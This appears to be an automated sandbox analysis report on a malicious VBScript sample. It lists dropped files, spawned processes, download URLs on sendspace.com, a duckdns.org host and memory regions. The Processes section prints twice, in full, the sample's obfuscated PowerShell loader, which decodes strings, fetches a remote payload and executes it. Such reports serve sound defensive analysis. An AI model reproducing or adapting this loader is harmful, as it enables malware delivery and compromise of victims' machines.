Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
windows.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5jqalbu.ymw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir33ht2e.has.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izhnjtxg.3t0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdelniyb.f0a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Briarberry.Mil
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function
Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke(
$Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads
'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives
pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i
AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus
0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads
' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara
/T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv
,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges
(Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays
S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf
elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop
PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe
trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r
Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM
S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts
oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm
stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci
');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$
S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo
MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna
rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr
kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll
aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln
Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron=
Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops
aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$
IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges
(Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj
rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals)
{Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud=
oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa
yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i
,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom
Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire
lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel
Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges
(Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue
AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr
');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams
Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr
C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav
W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe
reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e.
rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt
Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi
');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn
Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr
ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS
udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function
Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke(
$Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads
'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives
pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i
AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus
0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads
' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara
/T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv
,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges
(Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays
S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf
elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop
PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe
trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r
Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM
S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts
oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm
stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci
');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$
S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo
MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna
rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr
kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll
aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln
Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron=
Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops
aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$
IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges
(Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj
rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals)
{Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud=
oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa
yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i
,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom
Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire
lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel
Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges
(Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue
AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr
');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams
Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr
C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav
W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe
reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e.
rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt
Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi
');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn
Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr
ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS
udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
rachesxwdavid.duckdns.org
|
|
||
|
https://www.sendspace.com/pro/dl/dy1f16
|
172.67.170.105
|
||
|
https://www.sendspace.com/pro/dl/tbfvpd
|
172.67.170.105
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fs13n5.sendspace.com/Ezo8
|
unknown
|
||
|
https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin
|
69.31.136.57
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://fs03n1.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/tbfvpdXR
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://fs13n5.sendspace.com/yz
|
unknown
|
||
|
https://fs03n1.sendspace.comx
|
unknown
|
||
|
http://fs03n1.sendspace.com
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/tbfvpdP
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java
|
69.31.136.17
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://fs13n5.sendspace.com/om:443t
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/dy1f16/u28
|
unknown
|
||
|
https://fs03n1.sendspaX
|
unknown
|
||
|
https://fs13n5.sendspace.com/
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
rachesxwdavid.duckdns.org
|
57.128.155.22
|
|
|
|
www.sendspace.com
|
172.67.170.105
|
||
|
fs03n1.sendspace.com
|
69.31.136.17
|
||
|
fs13n5.sendspace.com
|
69.31.136.57
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
57.128.155.22
|
rachesxwdavid.duckdns.org
|
Belgium
|
|
|
|
69.31.136.17
|
fs03n1.sendspace.com
|
United States
|
||
|
172.67.170.105
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n5.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5723000
|
trusted library allocation
|
page read and write
|
|
|
|
12C90073000
|
trusted library allocation
|
page read and write
|
|
|
|
8D34000
|
direct allocation
|
page execute and read and write
|
|
|
|
21D41000
|
trusted library allocation
|
page read and write
|
|
|
|
8450000
|
direct allocation
|
page execute and read and write
|
|
|
|
6090000
|
heap
|
page read and write
|
||
|
12CF46F1000
|
heap
|
page read and write
|
||
|
21B4E000
|
stack
|
page read and write
|
||
|
23DB9000
|
stack
|
page read and write
|
||
|
7FF887010000
|
trusted library allocation
|
page read and write
|
||
|
6C6D000
|
stack
|
page read and write
|
||
|
919000
|
heap
|
page read and write
|
||
|
21D15000
|
trusted library allocation
|
page read and write
|
||
|
69DE000
|
stack
|
page read and write
|
||
|
2190F26D000
|
heap
|
page read and write
|
||
|
99E000
|
stack
|
page read and write
|
||
|
12C80B29000
|
trusted library allocation
|
page read and write
|
||
|
12CF4660000
|
heap
|
page read and write
|
||
|
6278000
|
heap
|
page read and write
|
||
|
7FFC000
|
stack
|
page read and write
|
||
|
4560000
|
heap
|
page execute and read and write
|
||
|
21ACB000
|
stack
|
page read and write
|
||
|
6915000
|
heap
|
page execute and read and write
|
||
|
7FF8870F0000
|
trusted library allocation
|
page read and write
|
||
|
6336000
|
heap
|
page read and write
|
||
|
6FC0000
|
heap
|
page read and write
|
||
|
21BF9000
|
trusted library allocation
|
page read and write
|
||
|
219D0000
|
remote allocation
|
page read and write
|
||
|
24C8B000
|
stack
|
page read and write
|
||
|
2190EDE8000
|
heap
|
page read and write
|
||
|
2190D605000
|
heap
|
page read and write
|
||
|
21D00000
|
trusted library allocation
|
page read and write
|
||
|
840C000
|
stack
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887080000
|
trusted library allocation
|
page read and write
|
||
|
24187000
|
heap
|
page read and write
|
||
|
706B000
|
heap
|
page read and write
|
||
|
81C4000
|
heap
|
page read and write
|
||
|
6260000
|
heap
|
page readonly
|
||
|
23D7A000
|
stack
|
page read and write
|
||
|
2A33000
|
trusted library allocation
|
page execute and read and write
|
||
|
12CF4670000
|
heap
|
page read and write
|
||
|
6364000
|
heap
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
2190D3A5000
|
heap
|
page read and write
|
||
|
EC0000
|
trusted library section
|
page read and write
|
||
|
2190F241000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
45E48FA000
|
stack
|
page read and write
|
||
|
5591000
|
trusted library allocation
|
page read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
6D30000
|
heap
|
page read and write
|
||
|
7FF886DBB000
|
trusted library allocation
|
page read and write
|
||
|
4591000
|
trusted library allocation
|
page read and write
|
||
|
7FF887110000
|
trusted library allocation
|
page read and write
|
||
|
2190F246000
|
heap
|
page read and write
|
||
|
9D412FD000
|
stack
|
page read and write
|
||
|
6125000
|
heap
|
page read and write
|
||
|
7084000
|
heap
|
page read and write
|
||
|
568000
|
stack
|
page read and write
|
||
|
7F20000
|
heap
|
page read and write
|
||
|
81D6000
|
heap
|
page read and write
|
||
|
7FF886F5A000
|
trusted library allocation
|
page read and write
|
||
|
45E50FE000
|
stack
|
page read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
731F000
|
stack
|
page read and write
|
||
|
2A56000
|
trusted library allocation
|
page execute and read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
12C80B12000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
6120000
|
heap
|
page read and write
|
||
|
2190D3BE000
|
heap
|
page read and write
|
||
|
